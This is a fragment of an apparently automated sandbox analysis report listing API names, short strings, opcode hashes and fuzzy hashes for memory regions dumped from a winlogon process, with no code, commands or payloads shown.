                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: d971139fb05815a79728a67a4b08760c6fbe338f4faaf200783333ac6c2a95e7
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 4D518E3A200A90ABEB74CFA9D54835877A1F354F96F34C117EA8A87BD6CB38D451CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: ff996069689e9adb4c39c6e894924d3e7f7579bacb489373341fae83957afcfd
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 5851B23A206B90AEEF748FA9D14835C77A0F355B9BF24C215EA8947BD6CB38D451CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: 3c8fe4181d57bde8610dc56ea65077bbac2591f1a464c2d41b7e5703e34ab205
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: EA11511931CFA5B1EB109BA9E80835A72A4F749B82FA48075AE4A93695FF78C945C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: 95432dd9826d381225eec497ac909ebfc8931623513a31093e2cfea6e35b5e9a
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: F6115719314FA172FF10DBA9E80935A53A4FB44B82FA48935AE4983AD5FF78C905C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: df98b87962186eb4fc5c7e3438245a12adda9e9b458913ece3bf6b2c649ca0b3
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: 54115419314FB1B2EB10DBA9E80939A63A4FB55B82FA48035AF49C3795FF78C905C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: eb36fadbe95ae4008ab3f261c906c7f475cc0eb0bc5e66f0e274ae4c17083868
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: BAD1F03A728EA0A9E712CFA9D4482DC37B1F754B99F508216CF5E97B99DB34C046C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: 9e471798156c1280565bf6b792fcdfecfe05ab569b43954ffdfafa451b690551
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: F9D1FD3A714EA0AAE712CFA9D4482DC37B1FB54B99F408216CF5EA7BD9DA34C056C341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: 287fe842ab90c4b700664987ccd38534f6a61572a044d93e97509e46b6328183
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: DCD1F036714FA0A9E712CFA9D4482DC3BB2F755B9AF408216CF6E97B99DA34C046C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: 73a2776b8e2ff7bec2cd2407b6cb587fc32e09a1c517dcbed4e2dbd3574e4dc5
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: 3A01E936624FA0EAE724DFAAE8081597BB1F788F81B198025DF4A53728EF34D451C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: 57f968ec4f757b5386a7a53b8c307fbd0feca5cabe83514e82c06f2302c5c80a
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: 5E010C36610FA0EAE714DFAAE80825977A1FB88F81F498425DF8E53768EF34D451C741
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: 1f3cec6b8e76a9c1fce85490febaf8b762a9f925f15cd277bfb9be87d739ced3
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: F2010C36610FA0EAE754DFAAE80819977A6F798F82F198025DF4E53728EF34D452C740
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC6528DF), ref: 00000225DC652A12
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: 166fce68f16cf624ff4a673cfefded8cecda6bcd045b6b65c3b83036e25d3154
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: AF91057AB20E71A9FB62CFBD94583AD3BA0F754B89F648106DE4A67785DB34C485C300
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC6828DF), ref: 00000225DC682A12
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: 1322c19891c0e0509819485d3d3f9fa32a15cd95b11245b1c32fa5b700374911
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: 7A91F43A710E71A9FB62CFA994583AD3BA0FB54B89F548106DE4A67BC5DB34C485C302
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC6B28DF), ref: 00000225DC6B2A12
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: d72f5abf9282de28b29b35567e135c9bc2ddf69964a90a3bd1668e3e3286d236
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: 6391E43A710E71A9FB62DFA994583AD3BE2F354B8BF448106DE5A57785DB34C485C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 49ecbcd141e5e098f4fbd77a192a25a3f7bf6b7e997a441ad3ac1415caa78097
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 66113C2A710F149AFB00CFA4E8583A833A4F71D759F440E21DA6D877A4EF78C164C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: ee8cd3234a2e1926b494ce625416e2b0e0b3e8a291bb8e44fd13f23c7907fb23
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 00115B2A711F149AEB00CFA4E8583A833B4F72975AF440E21EA6D867A4EF78C154C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: eae5c8a5ca668df4aeb4e9113d9e0bccb939e0345f6c8f559ba5ef4a004f994c
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: 2171E73A20CFA2A2E7759FEE98483AA7794F345BC5F658056DD4B83B88DE35C540C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: 06abf94a7006eaee770732734f1222bb354fc5c3bd5021a93067fca93aff2c8b
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: 0F71B43A200FA2A2EB76DFAE98583EA6794F384BC6F558426DD4957FC9DE35C500C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: 705a40dac4cf707c1400a96436808bbb4e32763e1bd80b0caf79df7c94a2b37b
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: 7A71E93A290FA161E775DFAE98483EA6794F385BC6F618026DE0DD3B88DE35C500C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: b357aedd56655febe1e83121fcdbd81deca393081262ff39b5b4dcae8858ae6d
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: DF51C23A316E20AADF55CB9DE44CB687392F348B9BF16C225DA4643789D778C841C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: e25ced9457bf99ced28a5d65ca64d7bdf8df994bf153afee4d3839932752c94c
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 0A61B036919FC491EB708F69E44479AB7A0F789B8AF048215EB9907B99CB7CC191CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
